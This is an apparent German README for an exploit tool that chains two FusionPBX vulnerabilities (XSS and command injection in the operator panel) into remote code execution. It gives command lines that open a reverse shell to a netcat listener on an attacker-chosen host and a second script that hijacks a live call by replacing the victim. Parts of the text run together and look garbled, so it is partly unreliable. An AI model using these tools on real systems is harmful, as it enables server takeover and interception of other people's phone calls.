
Kette CVE-2019-11408 – XSS im Bedienfeld und CVE-2019-11409 – Befehlseinschleusung im Bedienfeld.
Dieser einfache Code versucht, die Implementierung der verketteten Sicherheitslücke abzuschließen, die von Dustin Cobb bei RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX vorgestellt wurde.
netcat-Listener auf einem entfernten System (rce_listener_address).`python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat-Listener und stellt eine Reverse-Shell bereit.Während wir Call-ID, from-tag und to-tag eines Anrufs kennen, wird durch Ausführen des folgenden Codes Sie anstelle des Opfers im Anruf ersetzt.
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}